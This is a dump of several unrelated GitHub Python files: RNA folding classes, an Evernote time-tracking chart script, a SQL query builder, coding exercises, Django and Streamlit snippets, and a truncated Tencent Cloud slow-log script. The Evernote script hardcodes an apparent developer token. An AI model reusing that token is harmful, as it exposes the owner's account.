1 # the changing stretches coordinates are exclusive, unlike python coordinates\n merged_changing_intervals = utils.merge_intervals(all_changing_intervals)\n return merged_changing_intervals\n\n\n def make_mask_of_differential_intervals(self):\n merged_changing_intervals = self.get_differential_intervals()\n changing_state = np.zeros(len(self.sequence), dtype=bool)\n for i in range(merged_changing_intervals.shape[0]):\n curr_interval = merged_changing_intervals[i]\n changing_state[curr_interval[0] : curr_interval[1]] = 1\n self.changing_loops_mask = changing_state\n\n\n def get_AC_mask(self):\n A_C_mask = np.zeros(len(self.sequence), dtype=bool)\n\n for i in range(len(self.sequence)):\n curr_nt = self.sequence[i]\n if curr_nt == 'A' or curr_nt =='C':\n A_C_mask[i] = 1\n self.A_C_mask = A_C_mask\n\n\n def convert_to_numpy(self):\n self.major_conf.convert_to_numpy()\n self.second_conf.convert_to_numpy()\n\n\n def print(self,\n show_changing_structures = False,\n show_unchanged_structures = False,\n show_inner_stems = True,\n show_outer_stems = True,\n width = 113,\n do_return = False\n ):\n strings_to_print_list = []\n strings_to_print_list.append(self.name)\n strings_to_print_list.append(\"\")\n strings_to_print_list.append(\"Major loop folding:\")\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n major_str = self.major_conf.print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return = do_return\n )\n strings_to_print_list.append(major_str)\n strings_to_print_list.append(\"\")\n strings_to_print_list.append(\"Second loop folding:\")\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n second_str = self.second_conf.print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return=do_return\n )\n strings_to_print_list.append(second_str)\n strings_to_print_list.append('\\n\\n')\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n else:\n return \"\\n\".join(strings_to_print_list)\n\n def print_differential_ACs(self):\n major_string = \"\".join([\"|\" if x else \".\" for x in self.major_conf.differentially_unpaired_ACs])\n second_string = \"\".join([\"|\" if x else \".\" for x in self.second_conf.differentially_unpaired_ACs])\n return (major_string, second_string)\n\n def print_constant_ACs(self):\n paired_string = \"\".join([\"|\" if x else \".\" for x in self.major_conf.constant_paired_ACs])\n unpaired_string = \"\".join([\"|\" if x else \".\" for x in self.second_conf.constant_unpaired_ACs])\n return (paired_string, unpaired_string)\n\n\nclass conformation:\n def __init__(self):\n self.string = ''\n self.pairing_states = None\n self.pairing_states_with_stem_ends = None\n self.numpy = None\n self.constantly_paired_positions = None\n self.constantly_unpaired_positions = None\n self.differentially_unpaired_states = None\n self.differentially_unpaired_states_within_loops = None\n self.differentially_unpaired_ACs = None\n self.constant_paired_ACs = None\n self.constant_unpaired_ACs = None\n self.all_stretches = None\n self.stretches_with_spaces = None\n self.changed_stretches = None\n self.changed_stretches_no_short = None\n self.unchanged_stretches = None\n self.unchanged_inner_stretches = None\n self.outer_stretches = None\n\n\n def get_pairing_states(self):\n self.pairing_states = dotbracket_comparisons.convert_string_to_pairing_states(self.string)\n\n # def get_pairing_states_accounting_for_stem_ends(self):\n # self.get_pairing_states()\n # self.pairing_states_with_stem_ends = self.pairing_states.copy()\n # self.pairing_states_with_stem_ends = dotbracket_comparisons.convert_string_to_pairing_states_with_stem_ends(\n # self.pairing_states_with_stem_ends,\n # self.all_stretches)\n\n\n def convert_to_numpy(self):\n self.numpy = dotbracket_comparisons.convert_string_to_numpy(self.string)\n\n\n def get_all_basepair_stretches(self):\n self.all_stretches = dotbracket_comparisons.list_all_stretches_numpy(self.string)\n\n\n def combine_parts_of_the_same_stretch_together(self, MAX_SPACING):\n if self.all_stretches is not None:\n self.stretches_with_spaces = dotbracket_comparisons.find_parts_of_the_same_stretch(self.string,\n self.all_stretches,\n MAX_SPACING = MAX_SPACING)\n else:\n raise Exception(\"You should find all stretches before finding the stretches with spaces!\")\n\n\n def print(self,\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return = False\n ):\n\n strings_to_print_list = []\n strings_to_print_list.append(\"All stretches\")\n strings_to_print_list.append(textwrap.fill(self.string, width=width))\n\n\n if show_unchanged_structures:\n if self.unchanged_stretches is not None:\n string_to_print = self.get_unchanged_string()\n strings_to_print_list.append(\"The stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n\n if show_changing_structures:\n if self.changed_stretches_no_short is not None:\n string_to_print = self.get_changing_string()\n strings_to_print_list.append(\"The stretches that change between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n if show_inner_stems:\n if self.unchanged_inner_stretches is not None:\n string_to_print = self.get_unchanged_inner_stretches()\n strings_to_print_list.append(\"The INNER stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n if show_outer_stems:\n if self.outer_stretches is not None:\n string_to_print = self.get_outer_stretches()\n strings_to_print_list.append(\"The OUTER stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n final_string_to_print = \"\\n\".join(strings_to_print_list)\n\n if do_return:\n return final_string_to_print\n else:\n print(final_string_to_print)\n return \"\"\n\n\n def get_changing_string(self):\n if self.changed_stretches_no_short is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.changed_stretches_no_short\n )\n return string_to_print\n\n\n def get_unchanged_string(self):\n if self.changed_stretches_no_short is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.unchanged_stretches\n )\n return string_to_print\n\n\n def get_unchanged_inner_stretches(self):\n if self.unchanged_inner_stretches is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.unchanged_inner_stretches\n )\n return string_to_print\n\n\n def get_outer_stretches(self):\n if self.outer_stretches is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.outer_stretches\n )\n return string_to_print\n\n\nclass loop:\n def __init__(self):\n self.left_start = None\n self.left_end = None\n self.right_start = None\n self.right_end = None\n self.length = None\n self.left_seq = None\n self.right_seq = None\n\n\n def initialize_from_dict(self, inp_dict):\n self.left_start = int(inp_dict['forward'][0])\n self.left_end = int(inp_dict['forward'][1]) + 1\n self.right_start = int(inp_dict['backward'][0])\n self.right_end = int(inp_dict['backward'][1]) + 1\n self.length = self.left_end - self.left_start\n\n\n def fill_sequence(self, sequence_np):\n self.left_seq = sequence_np[self.left_start : self.left_end]\n self.right_seq = sequence_np[self.right_start: self.right_end]\n\n\n def get_fraction_unpaired(self, allow_canonical = True):\n n_mismatches = check_base_pairing.n_not_paired_bases(\n self.left_seq, self.right_seq,\n orientation=\"reversed\",\n allow_canonical = allow_canonical)\n fraction_unpaired = n_mismatches / self.length\n return fraction_unpaired\n\n\n def check_if_complementary(self, allow_canonical = True):\n fraction_unpaired = self.get_fraction_unpaired(allow_canonical = allow_canonical)\n is_complementary = fraction_unpaired == 0\n return is_complementary\n\n\n def introduce_random_sequence(self, seed = None,\n GC_only = False):\n if not seed is None:\n np.random.seed(seed)\n if not GC_only:\n low = 1\n high = 5\n else:\n low = 2\n high = 4\n random_sequence_array = np.random.randint(low=low, high=high, size=self.length)\n self.left_seq = random_sequence_array\n self.right_seq = check_base_pairing.make_reverse_complement(self.left_seq)\n\n\n def change_one_side(self, change_left_side = True, seed = None):\n if not seed is None:\n np.random.seed(seed)\n random_sequence_array = np.random.randint(low=1, high=5, size=self.length)\n if change_left_side:\n self.left_seq = random_sequence_array\n else:\n self.right_seq = random_sequence_array\n\n\n def change_one_side_given_seq(self,\n new_seq_array,\n left_subset_border,\n right_subset_border,\n change_left_side = True,\n make_complementary = False):\n subset_length = right_subset_border - left_subset_border\n compl_part_beginning = self.length - right_subset_border\n compl_part_end = compl_part_beginning + subset_length\n\n if change_left_side:\n self.left_seq = new_seq_array\n if make_complementary:\n subset_to_make_complementary = self.left_seq[left_subset_border : right_subset_border]\n complementary_part = check_base_pairing.make_reverse_complement(subset_to_make_complementary)\n self.right_seq[compl_part_beginning : compl_part_end] = complementary_part\n else:\n self.right_seq = new_seq_array\n if make_complementary:\n subset_to_make_complementary = self.right_seq[left_subset_border : right_subset_border]\n complementary_part = check_base_pairing.make_reverse_complement(subset_to_make_complementary)\n self.left_seq[compl_part_beginning : compl_part_end] = complementary_part\n\n def mask_out(self):\n mask_none_array = np.full(self.length, glob_vars._none)\n self.left_seq = mask_none_array\n self.right_seq = mask_none_array\n\n\n def longest_paired_stretch(self,\n allow_canonical = True):\n max_bp_stretch = check_base_pairing.max_base_pairs_in_a_row(\n self.left_seq, self.right_seq,\n allow_canonical=allow_canonical)\n return max_bp_stretch\n\n\n def change_original_sequence_accordingly(self, sequence_np):\n out_sequence = sequence_np.copy()\n out_sequence[self.left_start : self.left_end] = self.left_seq\n out_sequence[self.right_start: self.right_end] = self.right_seq\n return out_sequence\n\n\n def scan_original_sequence_for_bp_stretches(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the longest possible base pairing\n # masks out the stem itself\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_stretch = self.scan_other_sequence_for_bp_stretches(masked_sequence_np,\n allow_canonical = allow_canonical)\n return max_stretch\n\n\n def scan_original_sequence_for_bp_stretches_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_stretch = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = check_left_side)\n return max_stretch\n\n\n def scan_other_sequence_for_bp_stretches(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the longest possible base pairing\n # array of 2 x N holding lengths of the maximal stretches in each possible pairing\n # the first dimension is of size 2 since I am scanning both forward and reverse sequence\n\n max_stretch_left = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = True)\n max_stretch_right = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = False)\n max_stretch = max(max_stretch_left, max_stretch_right)\n return max_stretch\n\n\n def scan_other_sequence_for_bp_stretches_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n # scans the provided sequence with one side of the stem and checks for the longest possible base pairing\n # array of 1 x N holding lengths of the maximal stretches in each possible pairing\n full_seq_max_bp_stretches = np.zeros(sequence_np.shape[0] - self.length + 1)\n\n if check_left_side:\n query_sequence = self.left_seq\n else:\n query_sequence = self.right_seq\n\n for i in range(full_seq_max_bp_stretches.shape[0]):\n full_seq_max_bp_stretches[i] = check_base_pairing.max_base_pairs_in_a_row(\n query_sequence,\n sequence_np[i: i + self.length],\n allow_canonical = allow_canonical)\n max_stretch = np.max(full_seq_max_bp_stretches)\n return max_stretch\n\n\n def scan_original_sequence_for_number_of_bps(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the maximal possible number of base pairs\n # masks out the stem itself\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_number_of_base_pairs = self.scan_other_sequence_for_number_of_bps(masked_sequence_np,\n allow_canonical = allow_canonical)\n return max_number_of_base_pairs\n\n\n def scan_original_sequence_for_number_of_bps_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_number_of_base_pairs = self.scan_other_sequence_for_number_of_bp_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = check_left_side)\n return max_number_of_base_pairs\n\n\n def scan_other_sequence_for_number_of_bps(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the maximal possible number of base pairs\n # array of 2 x N holding lengths of the maximal possible number of base pairs in each position\n # the first dimension is of size 2 since I am scanning both forward and reverse sequence\n\n max_number_of_base_pairs_left = self.scan_other_sequence_for_number_of_bp_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = True)\n max_number_of_base_pairs_right = self.scan_other_sequence_for_number_of_bp_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = False)\n max_number_of_base_pairs = max(max_number_of_base_pairs_left, max_number_of_base_pairs_right)\n return max_number_of_base_pairs\n\n\n def scan_other_sequence_for_number_of_bp_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n # scans the provided sequence with one side of the stem and counts the number of base pairs\n # array of 1 x N holding number of possible base pairs at each positions\n number_of_base_pairs = np.zeros(sequence_np.shape[0] - self.length + 1)\n if check_left_side:\n query_sequence = self.left_seq\n else:\n query_sequence = self.right_seq\n\n for i in range(number_of_base_pairs.shape[0]):\n number_of_mismatches = check_base_pairing.n_not_paired_bases(\n query_sequence,\n sequence_np[i: i + self.length],\n allow_canonical=allow_canonical)\n number_of_base_pairs[i] = self.length - number_of_mismatches\n max_number_of_base_pairs = np.max(number_of_base_pairs)\n return max_number_of_base_pairs\n\n\n def compare_to_base_pair_array(self, base_pair_obj,\n do_print = False):\n bps_of_interest = base_pair_obj.array[self.left_start : self.left_end]\n expected_bps = np.arange(self.right_end - 1, self.right_start - 1, -1)\n same_bps_number = (expected_bps == bps_of_interest).sum()\n if do_print:\n print(\"bps of interest\")\n print(bps_of_interest)\n print(\"expected bps\")\n print(expected_bps)\n\n return same_bps_number\n\n\n def copy(self):\n new_loop = copy.deepcopy(self)\n return new_loop\n\n\n def print(self, do_return = False):\n string_to_print = \"Left stretch: %d - %d ; right stretch: %d - %d\\n\" % \\\n (self.left_start, self.left_end, self.right_start, self.right_end)\n if not self.left_seq is None and not self.right_seq is None:\n string_to_print += \"Left sequence: %s ; right sequence %s\\n\" % \\\n (utils.array_to_string(self.left_seq), utils.array_to_string(self.right_seq))\n if do_return:\n return string_to_print\n print(string_to_print)\n\n\n def get_base_pairing_array(self, sequence_np):\n base_pairing_state_array = np.full(sequence_np.shape[0], glob_vars._loop, dtype = np.uint8)\n base_pairing_state_array[self.left_start : self.left_end] = glob_vars._left_stem\n base_pairing_state_array[self.right_start: self.right_end] = glob_vars._right_stem\n return base_pairing_state_array\n\n\n def get_dot_bracket_string(self, sequence_np):\n base_pairing_state_array = self.get_base_pairing_array(sequence_np)\n base_pairing_state_strings_array = [glob_vars._extended_structure_to_char[x] for x in base_pairing_state_array]\n base_pairing_state_string = \"\".join(base_pairing_state_strings_array)\n return base_pairing_state_string\n\n\n\nclass base_pair_array:\n def __init__(self, inp_string):\n self.string = inp_string\n self.fill_array_from_string()\n\n def fill_array_from_string(self, unpaired_value = -1):\n bp_array = np.full(len(self.string), unpaired_value, dtype = np.int)\n stretches_np = dotbracket_comparisons.list_all_stretches_numpy(self.string)\n for i in range(stretches_np.shape[0]):\n current_stretch = stretches_np[i, :]\n stretch_length = current_stretch[1] - current_stretch[0] + 1\n for k in range(stretch_length):\n left_position = current_stretch[0] + k\n right_position = current_stretch[3] - k\n bp_array[left_position] = right_position\n bp_array[right_position] = left_position\n self.array = bp_array\n\n def array_to_string(self):\n pairing_mode_array = np.zeros(self.array.shape[0], dtype = np.uint8)\n indices = np.arange(self.array.shape[0])\n pairing_mode_array[indices < self.array] = glob_vars._left_stem\n pairing_mode_array[indices > self.array] = glob_vars._right_stem\n pairing_mode_array[self.array < 0] = glob_vars._loop\n string_to_write_list = [glob_vars._extended_structure_to_char[x] for x in pairing_mode_array]\n string_to_write = \"\".join(string_to_write_list)\n return string_to_write\n\n\n\n\n\n","repo_name":"goodarzilab/SwitchFinder","sub_path":"SwitchFinder/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":32174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"27050848284","text":"# coding=UTF-8\nimport collections\nimport re\n\nimport matplotlib.pyplot as plt\nfrom evernote.api.client import EvernoteClient\nfrom evernote.edam.notestore import NoteStore\nfrom matplotlib import font_manager\n\n# 设置字体(使得plt中能够显示中文)\nfrom matplotlib import font_manager\n\na = sorted([f.name for f in font_manager.fontManager.ttflist])\nfor i in a:\n print(i)\nplt.rcParams['font.sans-serif'] = ['Heiti TC']\nplt.rcParams['axes.unicode_minus'] = False\n\n# 在这里输入开发者Token.\ndeveloper_token = \"S=s58:U=12c3708:E=185be87b347:C=1859a7b2d90:P=1cd:A=en-devtoken:V=2:H=4efa402093efe8dab07bffa29495953d\"\n\n# 初始化参数\nsandbox = False\nchina = True\n\n# 获取客户端\nclient = EvernoteClient(token=developer_token, sandbox=sandbox, china=china)\n\n# 获取用户信息\nuser_store = client.get_user_store()\n\nversion_ok = user_store.checkVersion(\"Evernote EDAMTest (Python)\", 1, 25)\nprint(\"Is my Evernote API version up to date? \", str(version_ok))\nprint(\"\")\nif not version_ok:\n exit(1)\n\nnote_store = client.get_note_store()\n\n# 列出所有的笔记本\nnotebooks = note_store.listNotebooks()\nprint(\"Found \", len(notebooks), \" notebooks:\")\nprint()\n\nfor notebook in notebooks:\n print(notebook.name)\nprint()\n\n# 根据GUID拿到笔记本\nguid = 'c919a3d7-e1f6-4950-9755-7187e5e546e0'\nnotebook = note_store.getNotebook(guid)\nprint(\"现在拿到的是:\" + notebook.name + \"笔记本\")\nprint()\n\n# 展示/创建搜索条件\nsearches = note_store.listSearches()\n\n# 根据笔记本guid获取笔记本中所有笔记\nnoteFilter = NoteStore.NoteFilter()\nnoteFilter.notebookGuid = guid\nnotesMetadataResultSpec = NoteStore.NotesMetadataResultSpec(True)\nnoteList = note_store.findNotesMetadata(noteFilter, 0, 100, notesMetadataResultSpec)\n\n\n# 将笔记内容变成仅含有中文的字符串\ndef translate(str):\n line = str.strip()\n pattern = re.compile('[^\\u4e00-\\u9fa50-9]')\n # 只保留中文和数字\n zh = \"\".join(pattern.split(line)).strip()\n # 去除数字\n zh = re.sub('\\d+', '', zh)\n # 去除多余字段\n outStr = zh.replace(\n \"每日日程安排周年月日开始时间微软雅黑时间微软雅黑周一微软雅黑周二微软雅黑周三微软雅黑周四微软雅黑周五微软雅黑周六微软雅黑周日微软雅黑微软雅黑\",\n '').replace(\"微软雅黑\",\n '').replace(\n \"星期一星期二星期三星期四星期五星期六星期七\", '')\n return outStr\n\n\n# 将字符串转化为项目列表\ndef createWordsList(outStr):\n words = []\n outStr = translate(outStr)\n if ((len(outStr) % 4) != 0):\n print(len(outStr))\n print(\"数据格式有问题\")\n else:\n for i in range(len(outStr)):\n if (i % 4 == 0):\n word = outStr[i:i + 4]\n words.append(word)\n\n print(collections.Counter(words))\n return words\n\n\n# 统计整年时间花费\n# words = []\n# for i in range(0, len(noteList.notes)):\n# note = note_store.getNote(noteList.notes[i].guid, True, True, True, True)\n# temp = \"\" + note.title\n# if temp.__contains__(\"2022\"):\n# words = words + createWordsList(note.content)\n#\n# counter = collections.Counter(words).get(\"欢度元旦\")\n# collections.Counter(words).items()\n# print(collections.Counter(words))\n\n\n# 输入笔记的标题来确定是哪一本笔记\ntitle = '2023年第3周'\nfor note in noteList.notes:\n if note.title == title:\n requiredNote = note_store.getNote(note.guid, True, True, True, True)\n\n# 对笔记中的某些内容进行搜索和替换\n# newText = requiredNote.content.replace(\"冲刺\", \"工作\")\n# requiredNote.content = newText\n# note_store.updateNote(requiredNote)\n\n# 统计本周的时间花费并作图\ncounter = dict(sorted(collections.Counter(createWordsList(requiredNote.content)).items(), key=lambda item: item[1]))\nfor key in counter.keys():\n counter[key] = counter[key] / 2\nrects = plt.barh(range(len(list(counter.values()))), list(counter.values()), color=[\n 'seagreen', 'chocolate', 'darkorange', 'lightcoral', 'lightsalmon'\n])\nindex = [float(c) for c in range(len(list(counter.keys())))]\nplt.xlim(xmax=max(counter.values()) * 1.3, xmin=0)\nplt.yticks(index, list(counter.keys()))\nplt.title(requiredNote.title + '时间使用情况')\nplt.xlabel(\"花费时间(小时)\")\nfor rect in rects:\n width = rect.get_width()\n plt.text(width, rect.get_y() + rect.get_height() / 2, str(width), ha='left', va='center')\n\n# 解决图片保存不完整问题\nplt.tight_layout()\n\n# 图片写入文件\nplt.savefig(\"/Users/anshaowei/Downloads/count.png\", dpi=300)\nexit(1)\n","repo_name":"anshaowei/timeManager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34209626855","text":"from collections import deque\n\nfrom rosshm import log\nfrom rosshm.db.utils import fieldType\n\nlang = None\n\ndef select(obj, filter, where):\n\ttable = obj.tblname\n\tfields = tuple(obj.fields.keys())\n\targs = tuple()\n\tselect = '*'\n\tflen = len(filter)\n\tif flen == 1:\n\t\tselect = filter[0]\n\telif flen > 1:\n\t\tnames = deque()\n\t\tfor n in filter:\n\t\t\tif n in fields:\n\t\t\t\tnames.append(n)\n\t\tselect = \"%s\" % ', '.join(names)\n\ts = f\"SELECT {select} FROM {table} WHERE\"\n\ti = 0\n\tcond = ' AND '\n\tfor k, v in where.items():\n\t\tif i == 0:\n\t\t\tcond = ' '\n\t\tif k == 'pk' or k in fields:\n\t\t\ttyp = fieldType(obj.fields, k)\n\t\t\ts += f\"{cond}{k}=\" + lang.valfmt(typ)\n\t\t\targs += (typ(v),)\n\t\ti += 1\n\ts += \";\"\n\tlog.debug(s)\n\treturn (s, args)\n","repo_name":"jrmsgit/rosshm","sub_path":"rosshm/db/sql/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2616752457","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n\n def widthOfBinaryTree(self, root) -> int:\n data = []\n self.dd(root, 0, 0, data)\n maxWidth = 0\n for d in data:\n if d[1]-d[0] > maxWidth:\n maxWidth = d[1]-d[0]\n return maxWidth+1\n \n def dd(self, root, level, x, data):\n if (root == None):\n return\n \n while(len(data) < level+1):\n data.append([])\n \n if data[level] == []:\n data[level] = [x,x]\n elif x < data[level][0]:\n data[level][0] = x\n elif x > data[level][1]:\n data[level][1] = x\n \n \n self.dd(root.left, level+1, 2*x, data)\n self.dd(root.right, level+1, (2*x)+1, data)\n \n \n \n \n \n","repo_name":"semere01/Comptetitive-Programming","sub_path":"camp/week4/maximum-width-of-binary-tree.py","file_name":"maximum-width-of-binary-tree.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14789123438","text":"from django.views import View\nfrom django import http\n\nfrom goods.models import GoodsCategory, SKU\n\n\nclass HotGoodsView(View):\n def get(self, request, category_id):\n # try:...\n category = GoodsCategory.objects.get(id=category_id)\n # 一对多\n skus = category.sku_set.filter(is_launched=True).order_by('sales')[0:2]\n hot_skus = []\n for sku in skus:\n hot_skus.append({\n 'id': sku.id,\n 'name': sku.name,\n 'default_image_url': sku.default_image.url,\n 'price': sku.price\n })\n return http.JsonResponse({'code': 'OK', 'errmsg': 'ok', 'hot_skus': hot_skus})\n","repo_name":"fengyuan0807/new","sub_path":"打包2/django美多前台最后一天/meiduo_mall/test/热销排行.py","file_name":"热销排行.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39204152693","text":"import streamlit as st\nfrom PIL import Image\n\nimage = Image.open('GRS_logo.png')\nst.set_page_config(page_title=\"Home\", page_icon=\"🛖\", layout=\"wide\")\nst.image(image, width=300)\n\nst.write(\"# Welcome to Dr. Shirley monitoring system! v1.1 🙌\")\n\nst.sidebar.success(\"Let's go.\")\n\nst.markdown(\n \"\"\"\n #### *Dieses App ist für Anwendung Filtermethoden der Beschleunigungsdaten gemessen mit ADXL345 3-Axen Beschleunigungssensor*\n\n ---\n ### Wollen Sie die importierte Daten sehen?\n Checkout [Gallery](Gallery)\n ### Wollen Sie die neue csv-Dateien hochladen?\n Checkout [Upload](Upload)\n \"\"\"\n)\n","repo_name":"hydrophyl/dr_shirley_monitoring","sub_path":"_Home.py","file_name":"_Home.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2319028714","text":"l,u=map(int,input().split())\nfor num in range(l+1, u):\n sum = 0\n t = num\n while t > 0:\n digit = t % 10\n sum += digit ** 3\n t //= 10\n if (num == sum):\n print(num,end=\" \")\n \n","repo_name":"SSelvakumari/selva","sub_path":"code kata/armstrongrange.py","file_name":"armstrongrange.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23880486997","text":"stu_names = {'Mike', 'John', 'Andrew', 'Alice'}\ntut_name = {'John', 'Gerald', 'Don', 'Brian'}\nprint(stu_names | tut_name)\nprint(stu_names & tut_name)\nsorted_names = sorted(tut_name)\nprint('the sorted names are', sorted_names)\njoint_names = '-'.join(stu_names)\nprint('The joint names are', joint_names)\n\n\ndef countif(my_list, condition):\n return len([i for i in my_list if eval(condition)])\n\n\nl = [56, 2, 4, 67, 87]\nprint(countif(l, 'i > 5'))\n\nmytuple = (\"apple\", \"banana\", \"cherry\")\nmyit = iter(mytuple)\n\nprint(next(myit))\nprint(next(myit))\nprint(next(myit))\n\n# making an item to be an iterable\n\n\nclass Numbers:\n def __iter__(self):\n self.a = 1\n return self.a\n\n def __next__(self):\n if self.a < 15:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\n\n# my_class = Numbers()\n# my_l = iter(my_class)\n\n# for x in my_l:\n# print(x)\n\n# enumerate function- prints out the index position and the corresponding tuple element as well\nmy_tuple2 = (\"apple\", \"banana\", \"cherry\", 'mango')\nfor (i, x) in enumerate(my_tuple2):\n print(i+1, x)\n\n# zip function\nnames = ['Mike', 'Brian', 'Mary', 'Kevin']\nscore = (65, 67, 62, 64)\nmerged_list = zip(names, score)\nmerge2 = dict(merged_list)\nprint(merge2)\nfor (i, x) in enumerate(merge2):\n print(i+1, x)\n\n# list version\n# print(list(merged_list))\n\nfrom random import shuffle\n\n# create the encryption key\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nL = list(alphabet)\nprint((shuffle(L)))\n\n# making our dictionary using maketrans to create a special kind of dictionary that\n# defines how things will be translated.\n\n# encoding script\nencode_dict = str.maketrans(dict(zip(alphabet, L)))\nprint(encode_dict)\ntrans_word = 'This is a secret'.translate(encode_dict)\nprint('The encoded form of the message is ', trans_word, sep='\\n')\n\n# decoding script\ndecode_dict = str.maketrans(dict(zip(L, alphabet)))\nprint(decode_dict)\nexact_st = trans_word.translate(decode_dict)\nprint('The decoded form of the message is ', exact_st, sep='\\n')\n\n\n","repo_name":"osenya/py-ch","sub_path":"listpract2.py","file_name":"listpract2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32072903431","text":"from tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException \nfrom tencentcloud.cdb.v20170320 import cdb_client, models\nfrom multiprocessing import Process\nimport json\nimport time\n\ndef get_mysql_instance(SecretId, SecretKey, tp):\n try: \n cred = credential.Credential(SecretId, SecretKey) \n httpProfile = HttpProfile()\n httpProfile.endpoint = \"cdb.tencentcloudapi.com\"\n\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n client = cdb_client.CdbClient(cred, \"ap-guangzhou\", clientProfile) \n\n req = models.DescribeDBInstancesRequest()\n if tp:\n #params = '{\\\"InstanceTypes\\\":[1]}'\n params = '{\\\"OrderBy\\\":\\\"instanceId\\\"}'\n else:\n params = '{}'\n req.from_json_string(params)\n\n resp = client.DescribeDBInstances(req) \n js = json.loads(resp.to_json_string())\n mysql_Instance = {}\n if js[\"Items\"] != None:\n for data in js[\"Items\"]:\n if \"rc\" not in data[\"InstanceName\"]:\n mysql_Instance[data[\"InstanceId\"]] = data[\"InstanceName\"]\n return mysql_Instance # parm: dict\n\n except TencentCloudSDKException as err: \n print(err)\n\ndef get_mysql_slowlog(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep):\n time.sleep(process_sleep)\n try: \n cred = credential.Credential(SecretId, SecretKey) \n httpProfile = HttpProfile()\n httpProfile.endpoint = \"cdb.tencentcloudapi.com\"\n\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n client = cdb_client.CdbClient(cred, \"ap-guangzhou\", clientProfile) \n\n req = models.DescribeSlowLogDataRequest()\n params = '{\\\"InstanceId\\\":\\\"' + InstanceId + '\\\",\\\"StartTime\\\":' + str(stime) + ',\\\"EndTime\\\":' + str(etime) + ',\\\"Limit\\\":400}'\n req.from_json_string(params)\n resp = client.DescribeSlowLogData(req)\n js = json.loads(resp.to_json_string())\n if js[\"Items\"] != None:\n for data in js[\"Items\"]:\n data[\"InstanceName\"] = InstanceIdName\n data['SqlText'] = data['SqlText'].replace('\\n', '').replace(' ', '').replace(\"'\",\"\")\n print(data)\n return 0\n else:\n return 